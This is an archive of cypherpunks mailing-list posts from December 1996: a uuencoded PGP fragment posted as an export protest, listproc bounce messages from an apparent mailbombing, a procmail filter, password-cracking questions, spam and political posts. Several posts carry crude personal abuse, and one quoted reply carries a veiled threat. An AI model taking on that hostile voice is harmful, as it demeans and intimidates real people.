structuring of information regs will add new meaning to this.

Adam
--
A protest of the unconsitutional ITAR, a chunk of PGP.EXE:
------------------- PGP.ZIP part [001/713] ------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 12:56:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612262056.MAA00677@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE BASEBALL-CHAT CYPHERPUNKS@TOAD.COM 

CYPHERPUNKS@TOAD.COM: You are not subscribed to baseball-chat@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 26 Dec 1996 12:58:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <3.0.32.19961226125016.006bb764@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:31 AM 12/26/96 -0800, Ian Goldberg wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <1.5.4.32.19961221065041.003d70c8@popd.ix.netcom.com>,
>Bill Stewart  <stewarts@ix.netcom.com> wrote:
>>And that's not even counting the "You must turn on your laptop" crap.
>
>I just took my first flight with a laptop (USair), and, having heard
>stories like the above, was wondering how "on" the laptop would have to
>be (past the powerup password check?  I hope they're not expecting
>Windoze...).

In my frequent travels by plane, airport security never wanted to see more
than the memory check. [How much of the insides of a laptop could be
removed to get a memory count display? I'd guess most of it.]



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 26 Dec 1996 13:44:09 -0800 (PST)
To: postmaster@plaidworks.com
Subject: Please take down your instant mailbomb Web page immediately
Message-ID: <tkuwy8m9LQBI085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jesus Christ, Chuq, are you incompetent at *everything* you set your
hand to?  Your plaidworks.com ListAdmin Web page 
(http://www.plaidworks.com/ListAdmin/) is an open invitation to troublemakers
to mailbomb.

Gee, maybe I should root around plaidworks and see if I can find other
security holes.  Wouldn't it be fun if I could find a way to stuff the
Nebula ballot box . . . ? ;-)

If you wish to respond to this, please do it from another site than
plaidworks.com, as I am immediately telling procmail to bounce all mail
originating from that site:

#
#
#Toss email from rogue sites
#
#

#
# Plaidworks
#

:0
* ^(From|To|Received|Message-ID):.*plaidworks\.com.*
{
        EXITCODE = 67
        :0
        /dev/null
}

* ^(From|To|Recieved|Message-ID):.*207.167.80.66
{
        EXITCODE = 67
        :0
        /dev/null
}

                                                                               


> Return-Path: <cypherpunks-errors@toad.com>
> Received: from toad.com (toad.com [140.174.2.1]) by mail6.netcom.com (8.6.13/Netcom)
> 	id MAA17062; Thu, 26 Dec 1996 12:02:55 -0800
> Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id LAA24977 for cypherpunks-outgoing; Thu, 26 Dec 1996 11:08:35 -0800 (PST)
> Received: from plaidworks.com (plaidworks.com [207.167.80.66]) by toad.com (8.7.5/8.7.3) with SMTP id LAA24972 for <cypherpunks@toad.com>; Thu, 26 Dec 1996 11:08:31 -0800 (PST)
> From: listproc@plaidworks.com
> Received: from  ([127.0.0.1]) by plaidworks.com (8.6.9/A/UX 3.1) with SMTP id LAA27991 for <cypherpunks@toad.com>; Thu, 26 Dec 1996 11:09:13 -0800
> Date: Thu, 26 Dec 1996 11:09:13 -0800
> Message-Id: <199612261909.LAA27991@plaidworks.com>
> Reply-To: listproc@plaidworks.com
> To: cypherpunks@toad.com
> Subject: WHICH
> X-Listprocessor-Version: 6.0 -- ListProcessor by Anastasios Kotsikonas
> X-Comment: Boston University ListProcessor
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> X-Newsgroups: alt.security.cypherpunks
> 
> cypherpunks@toad.com: You are subscribed to the following lists;
> if none appear, you are not subscribed to any:
> MINORS
> MINORS-SCORES
> IHL
> BAY-AREA-HOCKEY
> ROLLER-HOCKEY-INTL
> WOMEN-IN-HOCKEY
> GIANTS
> GIANTS-TICKETS
> BASEBALL-CHAT
> SHARKS
> SHARKS-TICKETS
> SHARKS-CHAT
> HOCKEY-CHAT
> DALLAS-STARS
> LA-KINGS
> ONLINE-DRIVE
> PIT-PENGUINS
> MAPLE-LEAFS
> OTT-SENATORS
> PHX-COYOTES
> BHAWKS-L
> COL-AVALANCHE
> HOCKEY-COACHES
> HOCKEY-REFEREES
> CAL-FLAMES
> OAK-ATHLETICS
> HOCKEY-PLAYERS
> 
> 


-- 
Alan Bostick               | I'm not cheating; I'm *winning*!
mailto:abostick@netcom.com |      Emma Michael Notkin
news:alt.grelb             | 
http://www.alumni.caltech.edu/~abostick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 13:07:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612262108.NAA00995@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE BASEBALL-CHAT CYPHERPUNKS 

CYPHERPUNKS@TOAD.COM: You are not subscribed to baseball-chat@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 26 Dec 1996 10:10:16 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Unsubscribing Dr. Vulius
In-Reply-To: <15mgZD80w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961226131059.29623A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Dale Thorn <dthorn@gte.net> writes:
> 
> > this is a crypto list, and there are all those NSA spooks watching
> > everything we do....
> 
> Watching and laughing, no doubt.

And paying you to cause FUD, no doubt.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kenneth J. Hawley" <khawley@silenus.com>
Date: Thu, 26 Dec 1996 10:18:42 -0800 (PST)
To: lzkoch@mcs.net
Subject: re: Papers Galore
Message-ID: <3.0.32.19961226131952.0068e674@mail.silenus.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: bart@netcom.com (Harry Bartholomew)
>Subject: Papers Galore, address correction
>To: cypherpunks@toad.com
>Date: Tue, 24 Dec 1996 01:58:31 -0800 (PST)
>Sender: owner-cypherpunks@toad.com
>Forwarded message:
>
>> Date: Mon, 23 Dec 1996 15:16:39 -0500
>> To: cypherpunks@toad.com
>> From: John Young <jya@pipeline.com>
>> Subject: Papers Galore
>> 
>> The NSA-hosted National Information Systems Security
>> Conference, held in October, 1996, has made a wide
>> range of papers available (in PDF format), and listed in:
>> 
>>   http://csrc.nist.gov/nissc/1996/papers/NISSC/toc.pdf (110kb)
>>                                          ^^^^^
>
>    				should be NISSC96

Actually the correct URL is:

http://csrc.nist.gov/nissc/1996/papers/NISSC96/

followed by:    toc.pdf    and many others.

The URL will give you an FTP-style file list.

--
Kenneth J. Hawley			(616)372-5774
Principal				khawley@silenus.com
Silenus Group, Inc.			Detroit - Atlanta - Kalamazoo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 13:30:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: No requests found
Message-ID: <199612262131.NAA01639@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain


No requests found in your message. Requests should be included in the
body of the mail message.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 26 Dec 1996 10:50:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: Papers Galore
Message-ID: <1.5.4.32.19961226184606.006b9030@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Harry and Kenneth for correcting the URL for the
NISSC96 papers.

We've converted the toc.pdf to HTML for easy scanning of 
the impressive list of papers and panels:

   http://jya.com/nissc96.htm

Now who's going hyper-link the TOC to the files? Ease the
scrooge download torture?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 14:12:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612262213.OAA02591@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE OAK-ATHLETICS 

CYPHERPUNKS@TOAD.COM: You are not subscribed to oak-athletics@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 14:14:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612262214.OAA02618@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE SHARKS 

CYPHERPUNKS@TOAD.COM: You are not subscribed to sharks@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 14:14:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612262215.OAA02645@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE SHARKS-CHAT 

CYPHERPUNKS@TOAD.COM: You are not subscribed to sharks-chat@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 14:14:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612262215.OAA02672@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE SHARKS-TICKETS 

CYPHERPUNKS@TOAD.COM: You are not subscribed to sharks-tickets@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: troubled@mailmasher.com
Date: Thu, 26 Dec 1996 14:34:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: confidential banking?
Message-ID: <199612262234.OAA21169@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


I saw a posting on alt.privacy a couple of days ago from
100022.1345@compuserve.com (Mark Mage) advertising the
availability of what he called "the safest kind of bank
account legally available", something called "an anonymous
'Sparbuch'" account in Austria.

He said "The anonymous account is a bearer's account without
a name or, alternatively, may be made out in whatever pseudonym
you choose (as long as it is not obscene or otherwise illegal)."

I'm not at all familiar with Austrian banking law or this type
of account.  Would someone tell me if this is worth checking
into further?  'Mark Mage' says these accounts usually cost
$200 - $400 to set up, but he's asking "considerably less".







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: troubled@mailmasher.com
Date: Thu, 26 Dec 1996 14:34:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: confidential banking?
Message-ID: <199612262234.OAA21192@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


I saw a posting on alt.privacy a couple of days ago from
100022.1345@compuserve.com (Mark Mage) advertising the
availability of what he called "the safest kind of bank
account legally available", something called "an anonymous
'Sparbuch'" account in Austria.

He said "The anonymous account is a bearer's account without
a name or, alternatively, may be made out in whatever pseudonym
you choose (as long as it is not obscene or otherwise illegal)."

I'm not at all familiar with Austrian banking law or this type
of account.  Would someone tell me if this is worth checking
into further?  'Mark Mage' says these accounts usually cost
$200 - $400 to set up, but he's asking "considerably less".







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: troubled@mailmasher.com
Date: Thu, 26 Dec 1996 14:35:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: confidential banking?
Message-ID: <199612262235.OAA21415@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


I saw a posting on alt.privacy a couple of days ago from
100022.1345@compuserve.com (Mark Mage) advertising the
availability of what he called "the safest kind of bank
account legally available", something called "an anonymous
'Sparbuch'" account in Austria.

He said "The anonymous account is a bearer's account without
a name or, alternatively, may be made out in whatever pseudonym
you choose (as long as it is not obscene or otherwise illegal)."

I'm not at all familiar with Austrian banking law or this type
of account.  Would someone tell me if this is worth checking
into further?  'Mark Mage' says these accounts usually cost
$200 - $400 to set up, but he's asking "considerably less".



troubled@mailmasher.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 26 Dec 1996 11:46:35 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: Unix Passwd
In-Reply-To: <199612261556.HAA05096@slack.lne.com>
Message-ID: <Pine.LNX.3.95.961226144201.17791B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996, Eric Murray wrote:

> Fyodor Yarochkin writes:
> > 
> > 
> > Anyone has any success in breaking this?
> > -f
> 
> Many people have tried breaking the cipher, I have not heard
> of anyone being successful.
> 
> There is however a number of programs that attempt a brute-force
> of passwords, the best is called 'crack' and is written by Alec Muffet.

>From Applied Cryptography (2nd edition) I got the impression that it has
been cracked. Do a netsearch for "Crypt Breakers Workbench", its a
freeware program that attempts to do just that.

- Lester





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuji4@ix.netcom.com
Date: Thu, 26 Dec 1996 15:13:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Earn Extra Income
Message-ID: <199612262312.PAA27812@dfw-ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fuck_You_Nerds,

EARN EXTRA INCOME NOW!!!!!  WORK AT HOME
REFER ONLY - NO SELLING $500.-$1000 PER REFERRAL
NOT MLM  

	OUR PRODUCT "CHANGEMASTERS"

A COMPREHENSIVE PROGRAM CONSISTING OF:

  Audiocassette and life-changing information in text and
  workbook form (3 segments), serving as a roadmap, blue-
  print and a scientific model to achieve rapid, reliable
  predictable and permanent results necessary to succeed in
  life.  Particular focus is given to strategies and solutions
  sought for by the entrepreneur or someone wishing to start
  down the road to financial success, as well as those people
  who simply wish to be more productive and enhance their
  value in the workplace.

  Includes a weekly "live forum" hosted by a consultant
  who is there to give you valuable insight and direction 
  regarding this program and income opportunity or to 
  advise you on your own business and success building.  
  This forum is via a national teleconference.

FOR MORE EXCITING INFORMATION, E-MAIL FUJI4@IX.NETCOM.COM	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Thu, 26 Dec 1996 15:40:36 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Vandalism in New York City
In-Reply-To: <$m2n2805-.sTZiZD110w165w@bwalk.dm.com>
Message-ID: <Love@23840>
MIME-Version: 1.0
Content-Type: text/plain


> Xmas day vandals overturned 75 headstones in the Calvary
> Cemetry in Long Island City, near the residence of Earthweb's
> associate network administator Ray "Arsenic" Arachelian.

So?  New York City is so culturally ugly vandalism can only
improve it.

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@aracnet.com>
Date: Thu, 26 Dec 1996 15:42:20 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: Unix Passwd
In-Reply-To: <Pine.LNX.3.91.961226155652.3979T-100000@freenet.bishkek.su>
Message-ID: <Pine.LNX.3.95.961226154144.15340C-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain



	Mygod, please tell me you are saying this as a joke...

On Thu, 26
Dec 1996, Fyodor Yarochkin wrote:

> 
> Anyone has any success in breaking this?
> -f
> 

Genocide
Head of the Genocide2600 Group


============================================================================
		   **Coming soon! www.Genocide2600.com!
         ____________________
  *---===|                  |===---*
  *---===|     Genocide     |===---*     "You can be a king or a street
  *---===|       2600       |===---*   sweeper, but everyone dances with the
  *---===|__________________|===---*              Grim Reaper."
                                       
Email:  gen2600@aracnet.com	Web:  http://www.aracnet.com/~gen2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	It is by caffeine alone that I set my mind in motion.
	It is by the Mountain Dew that the thoughts acquire speed,
	the lips acquire stains, the stains become a warning.
	It is by caffeine alone that I set my mind in motion.
================================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Thu, 26 Dec 1996 02:51:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Unix Passwd
In-Reply-To: <32C18AA0.578E@sk.sympatico.ca>
Message-ID: <Pine.LNX.3.91.961226155652.3979T-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain



Anyone has any success in breaking this?
-f




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Thu, 26 Dec 1996 08:43:40 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: freedom is only relative
Message-ID: <199612261644.JAA09233@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

on 12/26/96 at 04:34 AM, Carl Johnson <toto@sk.sympatico.ca> said:
::Attila T. Hun wrote:
::>         is MALLAMACE an abbreviated anagram for 'malicious mace?'

::  Yes. Other abbreviated anagrams are:
::A ::  C :: and  ::  F

::  (I am thankful that I live in America, where I am free to use 
::the above abbreviated anagrams without fear of censorship.)

        as to lack of fear of censorship; ask the woman in Chicago, 
    approached by Clinton to shake her hand --she refused and said he 
    was criminal murderer.  Took 'em a week or so to get her and 
    husband even out of jail the first time, and I think the charges 
    are still going around in federal court.  

        through all this: Bubba a) got obscene, and b) threw a tempter 
    tantrum.  

        think Hillary will protect your civil rights in her Global 
    Village?  Keep in mind, it's on record, Hillary's Bill of Rights 
    is the same as the UN Bill of Rights, which just happens to be the 
    same as the Bill of Rights in the current Chinese constitution: 
    
        the UN's "International Covenant on Civil and Political
        Rights" (ICCR): Aricle 18 states that "everyone shall 
        have	the right to freedom of thought, conscience and
	    religion" but specifies that "freedom to manifest one's 
        religions or beliefs may be subject only to such 
        limitations as are prescribed by law and necessary..."

    sounds more like Bubba's attitude as expressed by Janet Reno and 
    Jamie Gorlick. maybe the Chinese took their model from the UN?  

   	    As Communist China prepares to digest Hong Kong in
	   July, it is moving quickly to suppress dissenting
	   voices in the media. Asian correspondent David
	   Aikman reports that Red China's Foreign Minister,
	   Qian Qichen, has forbidden future commemorations
	   in Hong Kong of the 1989 Tiananmen Square massacre.
	   When Hong Kong residents protested this decree,
	   foreign ministry spokesman Shen Guofang sought to
	   placate them with the following assurance:

	       "Hong Kong people will have full freedom of
	       expression, but all freedoms must be within 
	       the limits allowed by law."

    George Orwell was not late, just not recognized.

  ==
    Tyranny Insurance by Colt Manufacturing Co.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMsKpuL04kQrCC2kFAQGAbQP9FJmqIzipPGJ+fN/MuwQLqN6ZJODOkuP/
BDC8HjZ03BwOC91f1tR5TXGEstjwpGL9dxn+SrfpNDFrQNgnJNIbKSDNQasZtUCl
8OpkmFqrH/ALOrERxcTuc9VNLlCEL+IsKjK/pRsXWAIi7VV3uIrXTzorcQX/3d8I
M9WNk0rBbvA=
=WT+U
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@Alpha.remcan.ca (Mail Delivery Subsystem)
Date: Thu, 26 Dec 1996 14:19:34 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199612262113.QAA12979@Alpha.remcan.ca>
MIME-Version: 1.0
Content-Type: text/plain


The original message was received at Thu, 26 Dec 1996 16:13:49 -0500
from Dial50.Solutions.Net [204.112.6.160]

   ----- The following addresses had delivery problems -----
<istproc@plaidworks.com>  (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to plaidworks.com:
>>> RCPT To:<istproc@plaidworks.com>
<<< 550 <istproc@plaidworks.com>... User unknown
550 <istproc@plaidworks.com>... User unknown

   ----- Original message follows -----
Received: from shawn by Alpha.remcan.ca via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO)
	for <istproc@plaidworks.com> id QAA12978; Thu, 26 Dec 1996 16:13:49 -0500
Return-Path: <cypherpunks@toad.com>
From: cypherpunks@toad.com
Message-Id: <3.0.32.19961226161931.009c09f0@toad.com>
X-Sender: cypherpunks@toad.com (Unverified)
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Thu, 26 Dec 1996 16:19:34 -0600
To: istproc@plaidworks.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

UNSUBSCRIBE MINORS
UNSUBSCRIBE MINORS-SCORES
UNSUBSCRIBE IHL
UNSUBSCRIBE BAY-AREA-HOCKEY
UNSUBSCRIBE ROLLER-HOCKEY-INTL
UNSUBSCRIBE WOMEN-IN-HOCKEY
UNSUBSCRIBE GIANTS
UNSUBSCRIBE GIANTS-TICKETS
UNSUBSCRIBE BASEBALL-CHAT
UNSUBSCRIBE SHARKS
UNSUBSCRIBE SHARKS-TICKETS
UNSUBSCRIBE SHARKS-CHAT
UNSUBSCRIBE HOCKEY-CHAT
UNSUBSCRIBE DALLAS-STARS
UNSUBSCRIBE LA-KINGS
UNSUBSCRIBE ONLINE-DRIVE
UNSUBSCRIBE PIT-PENGUINS
UNSUBSCRIBE MAPLE-LEAFS
UNSUBSCRIBE OTT-SENATORS
UNSUBSCRIBE PHX-COYOTES
UNSUBSCRIBE BHAWKS-L
UNSUBSCRIBE COL-AVALANCHE
UNSUBSCRIBE HOCKEY-COACHES
UNSUBSCRIBE HOCKEY-REFEREES
UNSUBSCRIBE CAL-FLAMES
UNSUBSCRIBE OAK-ATHLETICS
UNSUBSCRIBE HOCKEY-PLAYERS






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Dec 1996 14:41:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fan mail from cocksucker John Gilmore and his friends
In-Reply-To: <3.0.16.19961226093417.506f2fb4@pop.netaddress.com>
Message-ID: <DJDkZD114w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I suspect that most of the cretins who shill for Timmy May and don't
otherwise say anything are actually his tenticles. (He has no testicles.)

>Received: (qmail 2304 invoked by uid 0); 26 Dec 1996 14:41:12 -0000
>Received: from stm-ct7-09.ix.netcom.com (205.184.161.41) by netaddress.usa.net via mtad (2.0) on Thu Dec 26 07:41:10 1996 (-700)
>Message-Id: <3.0.16.19961226093417.506f2fb4@pop.netaddress.com>
>X-Sender: iverson@pop.netaddress.com
>X-Mailer: Windows Eudora Pro Version 3.0 (16)
>Date: Thu, 26 Dec 1996 09:35:12 -0500
>To: dlv@bwalk.dm.com
>From: Casey Iverson <iverson@usa.net>
>Subject: A new beginning
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>
>At 12:11 AM 12/26/96 -0800, the asshole  russian mutant, who thinks we
>don't know he is posting this shit anonymously, spewed out:
>
>>Tim C[unt] May styles his facial hair to look more like pubic hair.
>
>Just remember dick brain, what goes around, comes around.
>
>*Your* time is near.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 26 Dec 1996 17:30:13 -0800 (PST)
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <199612270130.RAA14252@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 PM 12/26/96 -0500, Brian Davis wrote:
>
>On Wed, 25 Dec 1996, jim bell wrote:
>
>> At 12:31 AM 12/26/96 -0500, Brian Davis wrote:
>> 
>> I would argue that if the bank can be forced to help the government enforce 
>> the law, the bank should also become liable for damage done as a consequence 
>> of complying with such requirements.  While it's a different area, within 
>> the last few years a decision was made (SC?) that companies which had made 
>> Agent Orange for the US Government during Vietnam can be held liable 
>> (without recourse against the government, apparently) for the damages 
caused 
>> ex-servicemen for selling dioxin-tained Agent Orange to the government, but 
>> manufactured totally according to government specifications.  (and used 
only 
